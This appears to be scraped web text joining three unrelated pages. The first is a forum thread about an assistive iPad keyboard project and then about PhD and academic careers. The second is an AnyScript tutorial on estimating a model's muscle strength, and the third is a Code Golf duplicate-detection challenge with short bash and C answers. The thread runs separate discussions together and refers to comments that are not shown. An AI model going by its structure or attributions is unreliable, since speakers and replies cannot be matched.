I am definitely getting input from as many people as I can. Within a month, I'm going to start working with my potential users and their caretakers, so that'll be real feedback. I'm targeting http://ktype.net/wiki/research:disabilities which prevent people from talking or using a keyboard - the Stephen Hawkings of the world as well as autistic children with major speech problems. There are many existing solutions out there to help people with disabilities, but there are also very wide gaps in between. I'm trying to catalog everything I can find to help fill in the gaps, and I will make my own bridges if necessary. The new keyboard is an iPad app (Demo: http://ktype.net/wiki/dev:demo ) and it will be extremely customizable.
On the iPad itself, you can already define your own keys/layout: http://ktype.net/wiki/research:articles:progress_20110204

Additionally, I'm working on an auto-suggest feature that is vastly better than a cellphone's T9: http://ktype.net/wiki/research:articles:progress_20110209 Also, I want to make it work with a variety of hardware input devices. If you are a researcher making a brain-reading interface for paralyzed patients, don't hook it up to Windows! KType will learn from each user's patterns and will be customizable enough to support easy communication. I'm also going to integrate Twitter/email etc. soon enough: http://ktype.net/wiki/dev:roadmap

Don't get me started - I can keep talking about this 24/7 :)

This is the exact same thing I am planning to do. I am currently at a lavish tech consultancy firm, but the whole idea of being a "resource" is really stagnating my brain, and it also objectivizes humanity. I still can't stand being called a resource. I'm planning on quitting soon, and doing independent research while creating non-startup apps. Posts like this (and the link above) really motivate me. :) Best of luck to ya!

Thanks! Same to you. Feel free to keep me updated with your research projects.

Are you just doing research for research's sake? If so, good for you. If not, why try to do it independently? Don't you think you deserve to be rewarded for your work, i.e. compensated either with prestige or money? At the very least, wouldn't you like to be compensated for your contributions to the field?

I guess I'm doing it for the end-goal's sake. I really do want people with disabilities to be able to communicate better, including my own cousin. As long as my bills are being paid (regardless of the source of income), I don't need any rewards. I'm not a saint or anything - I just don't want to deal with the overhead of funding, grants, scholarships, sales, marketing, clients, customers. I want to make a usable, innovative product and keep improving it.
A few years ago my preliminary version got #1 on HN ( http://chir.ag/projects/ktype/ ) and since that day I have been working hard to change my life so I could work on it full-time. It took over a year, but I can finally do it now, so I'm very happy.

You might not want "customers", but nothing will help you innovate like users. Where I work we get mountains of feedback and use it to justify new features and to prioritize bug fixes.

I wholeheartedly agree, and I intend to start working with my potential users very soon.

Prestige and compensation are two ways of being rewarded. Another way is to just see your work make the world a better place and feel satisfied.

What is the ultimate goal of your research? If you are simply doing research for the fun of it, then you can only continue it without funding for as long as you have runway capital. I ask this question because I've thought about doing the same thing, but I'm not sure I could productize the research I want to do, so it scares me to begin and basically throw away my savings for no tangible benefit. I'd appreciate your thoughts.

I was very careful to pick realistic, targetable goals for my research project, KType. World peace wouldn't cut it. KType has the goals of:

• Improving communication for people with disabilities
• Creating low-cost software / hardware tools, customizable for each individual
• Providing useful research material and articles for families & friends
• Sharing case studies of actual users

Money doesn't factor into this because over the past few years, I've worked hard to ensure my bills are paid without me having to work full-time. My research project goals have to do with the real project's usability and accessibility, and not orthogonal accomplishments like publishing papers, getting grants, etc. That's all I need to keep me in focus. Every minute I work on KType, I am actually working on KType. It's a very slow process, but at least I know I'm moving in the right direction.
Watch for the 8-month wtf collapse, stay in bed for the requisite week, and then just get back up again.

This is a very interesting comment. It reads a bit like "PhD hacking". Did you try this? The work done by the OP indeed has potential to be published.

The above comment, while written in an encouraging tone, has some caveats that might be worth pointing out.

"(1) At at least some of the best US research universities, there is no coursework requirement for a Ph.D."

* I find that to be untrue. In my case, I had a M.S. before applying, and still had to take nearly 2 years of required coursework. It depends on the program, but I have not heard of any U.S. program that will accept a B.S. and not have required classes.

"(2) The requirement for a dissertation is, say, "an original contribution to knowledge worthy of publication". Since you've already been there, done that, got the T-shirt, there's no question. Big, huge advantage."

* Most students accepted to the best PhD programs (computer science) will already have top-tier publications before entering. It is definitely a good thing to have a publication, but rather than being finished, you will have just begun.

"(3) One more requirement would likely be the qualifying exams. These exams are to show that you are 'qualified' to move on to research and do research. But, uh, did I mention that you've already been there, done that, got the T-shirt?"

* Quals will still require reading deeply from the literature. You will be expected to know all the fundamentals in your computer science area to pass. Having published is irrelevant here.

"Maybe the US DoD VA would give you a grant."

* Often only professors can apply for the big grants, and writing a grant is actually non-trivial. They need to see a fantastic track record, a solid proven team, and often nods to diversity and educating the public.
Some students will help their advisors write the grant, but in the end it's the advisor who doles out the money and is the PI.

I feel the attitude of professors/academia being so easy to fool is somewhat overstated here. I won't go into the "ease of publishing" comments, but my first top-tier publication took 3 years with many rejections, when I was a non-student doing research. I also did a lot of research that was rejected and went into the "paper graveyard". After doing it a few times, publishing is significantly easier, since you will better know the methodology, the literature, and how to write academically. I'm not trying to be discouraging, but I find the above comment to be optimistic but a bit exaggerated.

"I find that to be untrue. In my case, I had a M.S. before applying, and still had to take nearly 2 years of required coursework. It depends on the program, but I have not heard of any U.S. program that will accept a B.S. and not have required classes."

Then go to the U.K. or the majority of the Commonwealth. Required coursework is not a necessary part of doctoral research in many, many departments of these universities.

Just a small comment - Princeton used to not require coursework, only quals. But it is rare to see this in current universities.

Thank you for the very useful comment, but why do you have so many "uh" words in your comment? Each indicates a non-standard, somewhat politically incorrect, 'street-wise', hush-hush, secret-of-the-real-world remark! Even so, it breaks the flow of the sentence. It's actually quite jarring to read. I think it would be clear what they were even without the extra indication - perhaps personal preference, though. (This is not to belittle the content you've got - really interesting stuff, pretty well backed up. Awesome.)

Nice comment, and one reason I write here. Writing politically incorrect comments can cause a lot of high emotions that can ruin the content.
Somehow some signal is needed to 'qualify' the content as, say, "not in the usual academic style"! Looks like I need a better signal. I'd like to get in touch with you sometime. Can you please share your contact info? If you don't want to put it in your profile, you can email it to me kirubakaran@gmail.com You're only getting one side of this, and before you find yourself in complete agreement ask yourself this: Are you agreeing because it confirms your bias and opinion of the academic system?I got a PhD from Cambridge. Everyone I worked with was helpful to a fault. Everyone shared credit when it was due, and declined offers of credit when they felt they hadn't contributed enough.I got my PhD, got a 3 year post-doc, changed fields into another 3 year post-doc, then got head-hunted into industry.My experience of academia couldn't be more different from the one described here.There's a story told of an elderly gentleman sitting sunning himself outside the city gates when a traveller came by. "What are people like here?" asked the traveller. "What were they like where you came from?" asked the elderly gentleman. Then no matter what the answer, he'd always say: "You'll find people here pretty much the same."I'm not saying that this individual didn't have bad experiences, I'm not saying he deserved them, I'm not saying academia is all roses, and I'm not saying manipulative sociopaths don't exist. They do.But my personal experience is different. If I remember correctly you studied math, didn't you? Competition for a job in math is way lower than it is for biological sciences. The reason is that the current model of a successful biology lab is that of a PI leading a number of students and postdocs anywhere from 5 to 20. There is NO WAY that all of them are going to find a job in academia. Germany alone produces in one year the same number of PhDs as there are professors in the country. Ratios are not very different in UK and US. 
Most of the competition happens in the biological sciences: you can run math or CS research by yourself. It is difficult to do the same in biology. I've written about it here: http://gilest.ro/2010/what-has-changed-in-science-and-what-m...

"Competition for a job in math is way lower than it is for biological sciences."

Actually, the opposite is true, at least in the United States. Many more Biological Science PhDs are granted relative to mathematics, but there is also a lot more funding in the life sciences relative to mathematics. The mathematics job market is more similar to the notorious humanities market than to the life sciences.

You hardly have postdoctoral positions in math, physics, and the social sciences. Lots of people still manage to get an assistant professor position after a PhD. Postdocs emerged only recently, and they are a buffer for those who cannot get a TT job after a PhD. In biology it is absolutely normal, in fact necessary, to go through ~5 years of postdoc before dreaming of applying. The estimates I know of for math are that 1/5 of graduates get a job in academia. In biology it is about an order of magnitude more difficult (some less well-backed-up estimates even claim it is 1/300).

"You hardly have postdoctoral positions in math, physics and social sciences."

I don't know anything about the social sciences. In physics, I know that postdocs are absolutely necessary and expected, to the same degree that they are in the life sciences. Mathematics is a little different. There is a very small minority of prodigy types who go right from graduate school to the tenure track. However, postdocs are still the norm, although they don't go by the name 'postdoc.' Usually they are pronounced 'visiting assistant professor' or 'instructor.' Here's an example of a 'postdoc' in mathematics. All of the big universities have them:

I second this. My experience getting a PhD in grad school (biochemistry) was a wonderful time in my life where I was surrounded by bright, helpful, passionate people.
While I was in that lab I saw lots of people get nice academic jobs and other people get nice jobs in industry. Now I'm in a post-doc in a happy lab full of bright passionate people. I regularly see people around me get good academic jobs. It is not easy, and does require a lot of devotion, skill, and luck (what doesn't?) but no-one should read this article and think that everyone in science is miserable. It works out for some people and not for others... just like everything else. Exactly - it sounds like he might have stumbled into the wrong lab. Like you, my experience has been very different, but I've certainly heard stories like his from house mates. It seems we were lucky.The other thing that occurred to me when I read this, was that he's constructed a false dichotomy for himself: work in a world-class place, which is probably indeed much like being an olympic athlete, or work in an absolutely rubbish place, which can't really support your research. Anything missing in the middle?? I complain about the state of academia all the time and went straight from my PhD to a startup, but I completely agree with you. My experience was rather wonderful. That's the hard part about things like this. It's almost completely subjective, so doing a study would be difficult. We're left with dueling anecdotes from credible people. Different fields vary a lot also, so it's probably not that useful to try to talk about "academia" as a whole. Not only do we have dueling anecdotes, but they aren't even anecdotes on the same subject. =] Imo, the pros and cons of being a physics versus a philosophy versus a CS academic just aren't that similar.I can believe that the 'hard' sciences are roughly like he says, at least at many places. It's common for there to be a sort of "lab" mentality, with a lot of grad-student cogs in a famous-professor-lab machine, and credit tends to go to the head of the lab (especially if the paper has 50 authors or something, as is common in some areas). 
Partly that's because it takes a lot of money to set up a physics/chem/bio lab, and there is a lot of grunt-work to be done.That's less common in CS, I think. Not inexistent, but you can find a research group that isn't like that. It's even less common in the humanities, but then you have a whole different set of problems (less money, fewer jobs). I think it varies drastically by subfield. I'm a physicist, and while there are some subcommunties that are cutthroat, there are many that are small and where people are pretty helpful to each other. I think a lot of it may also depend on the size of the community and the amount of money involved. The stories my ex-girlfriend told me about pharma research sounded pretty horrible... This is how many, many professions work. Musicians, writers, inventors, athletes, research scientists, pilots, and even small business owners all have the same career path. A few really driven, really lucky ones win the lottery and get to be household names. A small minority (maybe 1 - 5%) make an upper middle class living. The other 99% work for poor wages until they give up or get used up. It sucks, but it's hardly unique to science. If you're in a profession with a massive oversupply of labor, you can pretty much be guaranteed to see this kind of structure.I also spent half the article thinking that the author's struggles with vocabulary and grammar might explain his/her struggles to get ahead. Perhaps he/she is a non-native speaker and that's adding to the trouble? As an ex-classical musician, I can attest to your first point. However, the science Ph.D. glut seems to be generating more angst these days than it used to. I attribute this in part to rising tuition costs and greater student debt loads and an ever increasing disparity between supply and demand. 
I believe this Economist article was recently referenced on HN:http://www.economist.com/node/17723223?story_id=17723223Indeed, the production of PhDs has far outstripped demand for university lecturers. In a recent book, Andrew Hacker and Claudia Dreifus, an academic and a journalist, report that America produced more than 100,000 doctoral degrees between 2005 and 2009. In the same period there were just 16,000 new professorships. Using PhD students to do much of the undergraduate teaching cuts the number of full-time jobs. For pilots, I don't think you want to be one of the ones who gets to become a household name, as that generally only happens when you are the pilot during a crash or serious emergency. I also spent half the article thinking that the author's struggles with vocabulary and grammar might explain his/her struggles to get ahead. Perhaps he/she is a non-native speaker and that's adding to the trouble?I also noticed the many grammatical flaws in this post. I did a little digging, and the author does indeed appear to be a non-native speaker. (He's Italian: http://wiki.devicerandom.org/Who_am_I.) "Perhaps he/she is a non-native speaker and that's adding to the trouble?" - that's a red herring. Having spent some time in the academia sausage factory, I think this guy is fairly close to the mark. A lot of time and effort is consumed simply writing grants and genuflecting for government money. A perpetual stream of cheap labor (postdocs) is necessary to keep the cash spigot flowing, even though many of them have zero chance for a real career in their chosen field. I've seen incredibly petty behavior over attribution and credit on papers.I think most scientific progress happens in spite of the academic system, and not because of it. 
In some ways the old system of patronage was superior -- you had a direct connection between a king or wealthy merchant who had an interest in something and the scientists who needed funding to investigate it, instead of a vast bureaucracy that probably consumes more than the total amount it exists to allocate.

My current theory for success in academia (and I'm not an academic, so take it with a grain of salt) is a sort of synthesis of Dick Hamming's thoughts and other things I've read.

1. The purpose of a Ph.D. is to become a pre-eminent expert in a field. It's not to get a piece of paper. If you're not working on a career that will make you an expert, you'll be disappointed with your options after you have achieved your doctorate.

2. Find the interesting problems that people are afraid to work on and work on them very hard.

3. Use lots of techniques and approach your problems from many sides. Often something cool will shake out of the mix, and it won't have been in your research proposal.

4. If you aren't self-motivated, it's not right for you. If you don't enjoy the work, take your masters and go do something you enjoy.

5. Prepare your life for long hours and low pay with lots of frustration. Research doesn't proceed easily from point to point, and it's all about being around when you accidentally make a breakthrough.

I'm sure I'm about 90% wrong, but perhaps less wrong than the naive "Ph.D. is a way to stay in school and not have to face the real world" point of view.

My vision:

A rabbit is writing in a forest. A fox sees him.

Fox: "What are you writing?"
Rabbit: "How rabbits eat foxes."
Fox: "That's completely wrong! For that, I should eat you right now!"
Rabbit: "Please, just go see my supervisor first. He's in this cave."

The fox enters the cave and never comes out. The rabbit continues to write. The same happens with a wolf, and a bit later with a bear. Except the bear cannot fit into the cave; then a lion comes out and kills the bear.

Conclusion: it doesn't matter whether you are good or not.
It doesn't matter what the subject of your thesis is. All that matters is who your supervisor is.

A nice parable, though bears would destroy lions in combat if they met. :)

I'm going to have to disagree with the article for many reasons. First, I'm a Ph.D student and thus obviously biased. But second, while Ph.Ds can be unwise life decisions for many, it really depends on your field, and the most relevant field to this demographic is computer science. It really doesn't work that way in CS, because such a high volume of computer scientists leave academia post-Ph.D for industry. The CS industry (and the finance industry) has an insatiable thirst for deeply knowledgeable, qualified Ph.Ds. I don't know what the cost-benefit is (of spending 4 years in academia vs. getting paid high industry salaries), and I'm sure you could make more money going straight into a tech job; but I'm going to assume here that we are maximizing more than just $\sum_{life} income$.

PG has a Ph.D; he did fine (yay, anecdote). In my various internships around tech companies, there were plenty of senior coders who had Ph.Ds. And if you have a Ph.D in a relevant niche, you're probably going to be headhunted and well sought after. Where else do Wall Street or Google hire top machine learning specialists from?

Now, a Ph.D in sociology on the other hand... where do you go from there?

Sociology Ph.D.?
The better sociology programs try hard to be mathematical, in particular good with non-parametric statistics, all of multivariate statistics, and log-linear models. Also, actually doing science in sociology is tough because you have to be so careful about problem formulation, controls, spurious correlations, sampling, and measures (reliability and validity). So, for any solid quantitative work on marketing, ad targeting, public relations, public opinion polling, social program design and evaluation, or organizational design and evaluation (i.e., high-end HR), a good sociology background is about the best. As I recall, P&G knows this, but I don't know how many others know it!

I've observed that success in an academic environment requires more than simply scientific acumen. It also requires relentless self-promotion, networking, and a passion not only for science, but for winning the academic game. There are a lot of good science-minded people, and there are a lot of good, driven self-promoters. Most successful scientists you encounter (apart from the odd genius) belong in the intersection between the groups.

Well, some amount of self-promotion is necessary for success almost anywhere. Sure, if you come up with something miraculous, then it markets itself. But otherwise you have to make sure that the right group of people knows about it, or your idea will just fade away.

I keep getting 503 on the site. Here's a Coral cache: http://blog.devicerandom.org.nyud.net/2011/02/18/getting-a-l...

It is a matter of finding balance: finding the right advisor, keeping some time for the rest of your life (your girlfriend, your friends) even if you will have deadline rushes and think about your problem in the shower. This is a common problem for all passionate people, not only "scientists".
It just seems that you find a lot of passionate scientists in academia. This writing seems about right to me (except that I didn't experience that much bad collaboration/competition, even if I know it exists), as a second-year Ph.D student in AI applied to RTS games. I don't really like that you have to work 24/7 to not be left behind, and indeed I don't work that much. Life is too short to have yours dictated by the actions of others. If you want to stop at 50 hours/week while doing research, just try and make it so (focus your topic and focus on your advantages). But I'm happy pursuing a Ph.D. I don't have a fixed mindset/idea of what I would like to do next, though: a startup? Working at a big firm? Seeking tenure? All options will be considered, but right now I enjoy being paid (not much, particularly compared to my Masters classmates) to work on interesting topics and sometimes teach guys at the University about one of my passions (CS), with a great advisor (I picked him socially great and scientifically sharp; the mid-low h-index and the beard are byproducts), and so many intelligent people all around.

> This is a common problem to all passionate people more than only "scientists". It just seems that you find a lot of passionate scientists in academia.

The reason you find a lot of passionate people in academia, I think, has a large part to do with the PhD process. The monetary compensation isn't great for highly skilled labor, so the only way you'll be able to get through 5+ years of it is if you think it's the most fun thing you can be doing (or at least you think that for some large-ish fraction of the process).

Just to put it in perspective, I'm sure it's a real curse to have to spend the rest of your life doing something you purportedly absolutely love to do in a hell-hole like Pisa, Italy. That said, my heart absolutely goes out to this person, who is apparently really depressed. Hope he can find his happiness in life.
According to someone I know who got a job there, Pisa is a very boring town. Some scenery plus a few tourist traps, a low standard of living compared to the US [1], very little to do. Sounds fun before you go, much less fun after you've been there a few months.

[1] For hard numbers, I found this site, suggesting a professor in Italy has a real income about 2/3 that of a US professor: http://www.worldsalaries.org/professor.shtml

Pisa is a nice (but tiny) town, which will be boring if you are young and used to big-city life. That being said, I don't agree that the standard of living is low compared to the US; the standard of living really depends on what you look for. For me the salary is a poor indicator of quality of life. I'd rather earn less and have more holidays, live in a place with great food, art & culture, a slower rhythm of life, less pollution, health care, and nice landscapes.

I spent 7 years in Pisa and I moved to Cambridge some months ago. Cambridge is way more boring and depressing than Pisa.

"There is a second option, which is bare survival."

What about the third option: get your PhD and work in industry? I keep coming across statistics and CS PhDs who now work for Twitter, the New York Times, and industry research labs (AT&T, Microsoft). Why isn't an industry job a viable option?

"I keep coming across statistics and CS PhDs who now work for Twitter, the New York Times, and industry research labs (AT&T, Microsoft). Why isn't an industry job a viable option?"

Because (speaking as one of those people) a PhD is total overkill for nearly all industry jobs, and it costs a lot more to get one. It also probably works against you in most parts of the tech industry, where there's a surprising amount of blind opposition to anyone with a doctorate. Finally, remember that people with PhDs who work in industry have made a difficult, conscious decision to abandon the academic life.
It's not the expected outcome, and there's an intense cultural pressure not to leave the ivory tower. "It also probably works against you in most parts of the tech industry, where there's a surprising amount of blind opposition to anyone with a doctorate."I didn't encounter any doctorate-opposition per se. I think it's more opportunity cost issue.Tech industry is quite meritocratic. Problem for many people with PhDs is that this is the only thing they can show after many years spent hidden in academia, working on esoteric things.If you keep up your real world skills during graduate school, I believe nobody is going to hold your degree against you.At least that was my experience (and experience of my classmates from graduate school).We did a lot of nitty-gritty software engineering during graduate school (ideas from our papers had to be implemented and integrated into bigger projects, that's how funding pipeline worked).Also it helps not to act smug about your degree - industry is full of very smart people who didn't even go to university. Let's be clear: I'm not complaining, nor am I talking about personal experiences of discrimination -- I don't know if my resume has ever been circular-filed because of my degree. But since I left academia I have been surprised by the number of people who have explicitly told me that they consider a PhD to be a black mark on a resume. I think a lot of people have had one or two bad experiences interviewing/hiring PhDs, and they associate the degree with the incompetence because it's so rare to interview someone with a doctorate.For what it's worth, I don't find the tech industry to be more or less meritocratic than any other -- we certainly like to pretend that our hiring methods are hyper-objective, but I've seen lots of hiring decisions that just boil down to opinion and intuition. Non-meritocratic things like pedigree and 'who you know' matter a lot, even amongst engineers. 
I meant no offense.Fully agree with what you said - there is a lot of sampling bias because of relative rarity of PhDs (few bad apples can completely color expectations).It was quite a surprise for me when doing a summer program at major US corporation and everybody was going gaga because our group had many PhDs.In academia, everybody has doctorate, so degree in itself doesn't really confer any additional signal.In industry, people take it as a signal even when it is not (person matters more than degree, the same person would be hireable / not-hireable whether having or not having degree).But anyways, you wouldn't want to work at places / for people which can't / don't take such things into account.That's why I mentioned meritocracy - it's nicer to work at places where it matters only if you can get the job done, not your degree / pedigree / who-you-know.But yeah, human nature, hard to fight against, we all like signaling (it's useful heuristics after all). As one major exception, Google looooooves PhDs Because a Masters is almost as good for getting an industry job, and a Masters plus a 4 years relevant job experience is superior for the majority of positions where they hire Ph.D.s. And during those four years, the doctoral candidate was getting paid crap, the Masters's graduate raking it in. There are few industries which do the kind of research that they hire PhDs for. WELCOME TO LIFE. I've worked in academia, industry and finance. It's all a pyramid. Play the game or you'll be passed over. Exactly. Those of you who think the world is fair or based on merit need to read "Power: Why Some People Have It - And Others Don't" by Jeffrey Pfeffer.The world isn't fair. This is true whether you're in academia or industry, and accepting this fact isn't a bad thing, nor does it mean you've given in to the dark side. As retube points out, if you don't play the game you're conceding before you even start. 
While I sympathize with the author, I don't think we can generalize from his experience all that much. For a balancing anecdote, here's my life progression to date:

Bachelors: 22
Start PhD: 24
Meet girl: 25
Get engaged: 27
Submit thesis: 27
s/girlfriend/wife/: 28
Get 6-figure salary working for Mozilla: 28
Am now: 29

Yes, everything turned out better than expected (though I omitted the bit where I started and folded a company in there), and it could have gone horribly wrong. But you just can't generalize about doing a PhD, or anything really, from his anecdote, or from mine.

When I graduated with my degree in physics, I was introduced to something called Ruby on Rails, and instead of going on to grad school I pivoted into the life of a web developer. Best thing that ever happened to me. I did go to physics grad school, but eventually I came around. :-) http://railstutorial.org/book#author

So, I often have to justify the time I spent getting a PhD in computer science (cryptography), because nowadays I have a start-up that programs Facebook apps. The only reason I can is that I really didn't spend that much time actually working during the whole period, and I spent a lot of time learning to surf and to play tennis well. I really feel like I learned a lot of valuable lessons from learning to play tennis and to surf. I'm really glad my PhD afforded me the time and money to make that possible.

I had a similar painful revelation, as do 95% of people who get science PhDs. Fortunately it happened when I was a postdoc, so at least I got my honorable discharge.

Here's a link to that article in The Economist that states there are too many people doing too much of _everything_ and life is hard in general. Oh wait, that doesn't exist yet, perhaps because that's reality. It sounds like he has spent so much time doing everything but what he _should_ be doing, which is looking for something he actually _enjoys_ doing.
Not that the article wasn't insightful or lucid or anything, but what struck me is that he clearly enjoys complaining about his work life more than doing it, so there's a problem. I don't love my job but I enjoy doing it most of the time, and I have great hobbies, a great partner in life, and am happier and fitter than I have ever been. Perhaps he should try doing different things and see how that works out, since when you are doing something new you don't have any expectations. Why would you say "I love science, I just don't love doing it"? I love Formula One cars but don't know anything about driving them, whereas I love riding motorcycles and riding bikes. He needs to find the action verb that defines his work life and not impose any expectations from a noun he associates with "love."

Isn't the real problem here that we rely on "academia" to be the "experts"? I know a number of very accomplished and intelligent folks who did not pursue a PhD and have done phenomenally well in their own research. But sadly many, for credibility's sake, had to advertise themselves as think tanks. Why can't we just put the damn degrees down and listen to the person to judge their competency?? Self-taught mathematicians used to be very common (100 years ago).

Thankfully this guy figured it out when he was only 30. He's still got lots of time to figure out new ways to use and market the skills he has acquired.

New thought: academia isn't broken, there are just too many people who want to be academics. What do people think? In a perfect world, the growth in automation that improves efficiency should create more places for people who can engage in academic research toward longer-term goals. Obviously wealth distribution is far from perfect. I think it's really a wasted opportunity that so many are ready and willing to devote their lives to research and we can't make the economics work for it.

"New thought: academia isn't broken, there are just too many people who want to be academics."
What do people think?

Not too much of a new thought; the recent Economist article [0] on academia made a similar assertion. Indeed, the OP cites the very same article.

I am a researcher who's fortunate enough to have found a permanent position at a place that I love, doing work that I enjoy. I've served on program committees of conferences, organized workshops, etc. However, I must admit that some of the OP's thoughts are correct. There is definitely a problem with an oversupply of PhDs relative to the job market in physics (and likely biology). For a biology faculty position at, say, Berkeley, there used to be approx. 600 applicants per position. For physics at first- or second-tier institutions the number may drop to 200. Even if we are cruel and suggest that half of those are unqualified, that still leaves a large pool of extraordinarily qualified people competing for a rather small pool of jobs. I see this regularly when there are young postdocs with good publication records (Nature, PRL, etc.) who are having trouble finding permanent positions after their postdocs. Part of this may be related to decreased state funding and hiring freezes (in several states, there have been furloughs). Even for postdocs who have decided that they would prefer to work at an undergraduate institution and teach, the competition is fierce. Oddly, even for those who want to teach at a public high school, it's hard because of the education requirements (you can run a facility and teach freshmen at an elite college--but teaching high school seniors....). Things are so fierce that it's rather hard to have much selectivity about geography. This can wreak havoc with relationships, and in physics it is known as the two-body problem--where a couple in science has difficulty finding positions in the same zip code.
As one colleague told me, she'd be happy to just have the same time zone....

For my subfield, industrial research positions have been gradually drying up (at least for doing physics rather than engineering). A number of companies in the past were able to use monopoly profits to drive research (think of AT&T Bell Labs, which is now but a shadow of its former self--when I was there as an intern, it was amazing....). However, many have scaled back. Thus, I have seen a number of people pursuing various exit strategies. During the internet boom (when I had decided to drop computer engineering as a major because physics was more fun), a number of people who could code dropped out and joined startups. Later, people from Ivy institutions joined consulting firms such as McKinsey (with a "mini-MBA"). Later still, a number joined in the gold rush of financial engineering. While that continues, many go through a brief masters first to get their foot in the door. A few turn to more engineering-related work. So, while the unemployment rate for physics PhDs is low, not so many are actually still doing physics research.

For myself, I'll take on undergraduate and high school interns. No graduate students. I really respect string theorists who for years intentionally limited the number of students they would accept due to the paucity of permanent positions. For years, I'd been reluctant to take on a postdoc due to the current situation. Now, I've taken on my first postdoc and will do my best by him--but I have to be honest about the job market, and I'm having him learn some programming as a plan B. Plan C is that I'm very confident he'll be able to get a position in his home country afterwards.

I've seen some people who are bitter (think of the opportunity costs!) when they leave.
But I've seen some who are mellow--"At least I got to work with something beautiful for a while....". Part of the difficulty is that as a scientist, you don't go into it for the money (at least I hope you don't!); you go into it for love. So doing science becomes not just a job, but rather a calling and a way of life. Thus someone's sense of self may often become tied to being a scientist--and that's hard to leave behind...

So to summarize: while not all fields of science are cutthroat, given the level of competition, it is very hard to find a job. Also, given that level, people have to work extremely hard, and it takes a toll on their personal lives (it's hard to have one when average work weeks extend to 60-80 hrs for a number of experimentalists--my solution has been to sleep less, but I'm told that's unhealthy...).

[deleted]

> but how credible is he as a source if he can't even pass his quals?

Where did he say that?

The graphic showing what actually happened vs. what he planned.

That is a comic from "PhD Comics", for Newton's sake. Where did you get the notion that he couldn't even pass his quals? Moreover, what does that have to do with the correctness of his complaints? On an unrelated note, I find it mildly interesting that you say it was your "fault" that you weren't cut out for academic research.

This is a good outline of a problem, with absolutely no insights into any possible solutions. As far as I'm concerned this is a half-finished post. It's not enough to simply complain about/outline the problem. You have to use that personal experience to offer up some kind of personal redemption or possible global solution to really keep the conversation moving.

You don't have to find solutions to point out a problem. He might be so fried by the experience that he doesn't have the presence of mind to come up with solutions. It seems like the goal might have been to put academia on notice so _it_ could determine whether or not it cares about the problem enough to solve it.
I hope this is a farcical attempt to write an academic-style review of his Dear John letter to academia.
https://anyscript.org/tools/estimating-maximum-model-strength/
# Getting the maximal strength of your model!

When working with subject-specific scaling of models, it can be valuable to know what the strength of your model is for a given posture. This post shows a way of calculating the maximal strength of a simple 2D arm model in various postures. The concepts presented can of course be extended to models involving the full body model or parts of it.

To do this we first need to set up an example model. The model is a 2D arm model comprised of an upper and lower arm segment, attached with 8 simple muscles (fig. 1). The model is constrained to only allow movement in the global x and y direction. This allows us to impose movements that resemble flexion and extension of the shoulder and elbow joint. Since we want to show a general way of calculating the strength, we set up four load scenarios to mimic a flexion, extension, push, and pull movement. Since we want to investigate maximum strength, we need to be sure that the muscles are recruited appropriately. This is done by switching to the MinMax_Strict muscle recruiter.

The first step in finding the default max strength for a posture is to know the relationship between load and max muscle activity ($mmact$). We do this by implementing a parameter study to investigate the $mmact$ across a spectrum of loads, using the AnyParamStudy class. This study runs our model through the loads defined in the $load$ variable. So, in this example it does 100 steps where it starts at -200 N and stops at 300 N. This enables us to plot the $mmact$ as a function of the load. By running the parameter study for all four load scenarios we end up with a graph as seen in fig. 2. We can see that for very low loads there might be other factors affecting the relationship. If we dwell on this fact and think about why this could be, we can infer that the influence of gravity and segment mass could interfere with the relationship between $load$ and $mmact$.
This means that when applying low external loads, the important factor in $mmact$ is the mass of the moved segments and the gravity imposed on these segments. The graph also tells us that for high loads there is a linear relationship between load and $mmact$, and the linear part crosses through $mmact = 1$ for all scenarios. We can use this information to calculate the maximal strength of the model. The equation for a linear function is

$$y = ax + b$$

where in this case $y$ is the $mmact$, $x$ is the load, $a$ is the slope of the function, and $b$ is the intercept with the y-axis. The slope of the linear part can be calculated using only two points:

$$a = \frac{y_{2} - y_{1}}{x_{2} - x_{1}}$$

Now that we know the coordinates of two points and the slope, we can figure out what the load is at $mmact = 1$. For this we again look at the slope equation, only this time we know the slope, the point $\left( x_{2}, y_{2} \right)$, and the $y_{1}$ coordinate, which should be equal to 1. We are therefore interested in finding $x_{1}$. We rearrange the slope equation into

$$x_{1} = x_{2} - \frac{y_{2} - y_{1}}{a}$$

This allows us to evaluate the maximal load $x_{1}$ that the model can support in a given posture. To check our results, we can calculate the maximal strength with this equation and try to implement that load in our model. As anticipated, the $mmact$ reached 0.996, and the same holds across all four load scenarios.

### Find the code on GitHub

The AnyScript example which shows the concepts of finding the maximum muscle strength is available on GitHub.
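The rearrangement above is easy to sketch outside AnyBody. Below is a minimal Python illustration (not part of the original AnyScript example; the two sample points are made up) that takes two (load, mmact) points from the linear part of the curve and solves for the load at mmact = 1:

```python
def max_load(p1, p2, target_activity=1.0):
    """Given two (load, mmact) points on the linear part of the
    load/activity curve, return the load at which mmact hits the target."""
    (x1, y1), (x2, y2) = p1, p2
    a = (y2 - y1) / (x2 - x1)          # slope of the linear part
    # rearranged two-point form: x1 = x2 - (y2 - target) / a
    return x2 - (y2 - target_activity) / a

# hypothetical sample points: mmact = 0.25 at 100 N, mmact = 0.75 at 300 N
print(max_load((100.0, 0.25), (300.0, 0.75)))  # -> 400.0 (up to floating-point rounding)
```

The same two-point bookkeeping applies to any of the four load scenarios; only the sampled points change.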
https://codegolf.stackexchange.com/questions/145030/in-search-of-a-soulmate?page=2&tab=votes
# In Search of a Soulmate

Given a nonempty finite list of integers, output a truthy value if there are exactly two equal entries and all other entries are distinct, and a falsey value otherwise.

### Examples

truthy:
[1,1]
[1,2,1]
[1,6,3,4,4,7,9]

falsey:
[0]
[1,1,1]
[1,1,1,2]
[1,1,2,2]
[2,1,2,1,2]
[1,2,3,4,5]

• I suppose we can't assume that the integers will always be less than 10? – Martin Ender Oct 11 '17 at 20:17
• Yes, except if your language does not support any larger integers. – flawr Oct 11 '17 at 20:22
• Can you elaborate what you mean by consistent? – flawr Oct 11 '17 at 20:40
• Saw this on the top of HNQ & thought we'd reached the final interpersonal.se question – gntskn Oct 11 '17 at 23:15
• @Walfrat Post it as your own challenge. Also such feedback is usually appreciated in the sandbox. – flawr Oct 12 '17 at 14:37

sort|uniq -dc|grep -Pqz '^ *2 .*\n$'

Output is via exit code, where 0 is success (truthy) and 1 is failure (falsy). Try it online!

# C (GCC), 80 78 bytes

i,j,t;f(x,l)int*x;{for(i=t=0;i<l;++i)for(j=0;j<i;)t+=x[i]==x[j++];return!~-t;}

-1 thanks to Jonathan Frech
-1 thanks to Kevin Cruijssen

Try it Online!

